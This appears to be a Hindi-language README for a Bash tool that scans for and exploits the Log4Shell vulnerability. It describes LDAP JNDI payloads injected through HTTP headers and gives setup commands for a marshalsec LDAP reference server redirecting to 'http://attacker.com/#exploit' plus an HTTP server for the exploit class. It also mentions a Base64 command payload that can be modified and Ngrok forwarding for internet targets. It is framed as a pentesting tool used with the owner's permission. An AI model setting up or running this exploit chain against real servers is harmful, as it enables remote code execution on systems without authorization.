Log4Shell-Scanner-Exploit
बैश स्क्रिप्ट जो Log4shell कमजोरी की पहचान और/या दूरस्थ रूप से शोषण करने की अनुमति देती है।
यह उपकरण LDAP पेलोड और X-Api-Version, User-Agent तथा X-Forwarded-For हेडर का उपयोग करके विभिन्न परीक्षण करता है।
हमेशा इस स्क्रिप्ट का उपयोग ऑडिट किए गए सेवा/एप्लिकेशन के स्वामी की पूर्व अनुमति से करें।
निर्भरताएँ:
- हम Github से एक पूर्व-कॉन्फ़िगर्ड LDAP सर्वर बनाएंगे: https://github.com/mbechler/marshalsec
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
-
हम एक HTTP सर्वर सक्षम करते हैं
python3 -m http.server 8080
-
Java इंस्टॉल होना चाहिए
#sudo apt install default-jre
-
Curl इंस्टॉल होना चाहिए
#sudo apt-get install curl
उपयोग का उदाहरण:
निम्नलिखित पैरामीटर दर्ज करें:
- स्कैन करने के लिए URL की सूची
- LDAP सर्वर का IP पता
- LDAP सर्वर पोर्ट
- HTTP सर्वर का IP पता
- HTTP सर्वर पोर्ट
#इंटरनल नेटवर्क पर एप्लिकेशन स्कैनिंग का उदाहरण:
- ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

#इंटरनेट पर एप्लिकेशन स्कैनिंग का उदाहरण:
- ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

स्पष्टीकरण:
- उपयोग किया गया पेलोड कमजोर पहचानी गई मशीनों को "ifconfig" कमांड भेजता है, यह पेलोड Base64 में एन्कोडेड है और इसे पेंटेस्टिंग ऑडिट में शोषण चरण को अंजाम देने के लिए संशोधित किया जा सकता है।
- यदि आप उपकरण को इंटरनेट सेवाओं में उपयोग करना चाहते हैं, तो आप Ngrok सेवा शुरू कर सकते हैं जो LDAP सर्वर के स्थानीय पोर्ट पर पोर्ट फ़ॉरवर्डिंग करती है।
- इस स्क्रिप्ट का उपयोग हमेशा विश्लेषित सेवा/एप्लिकेशन के स्वामी की पूर्व अनुमति के साथ करें।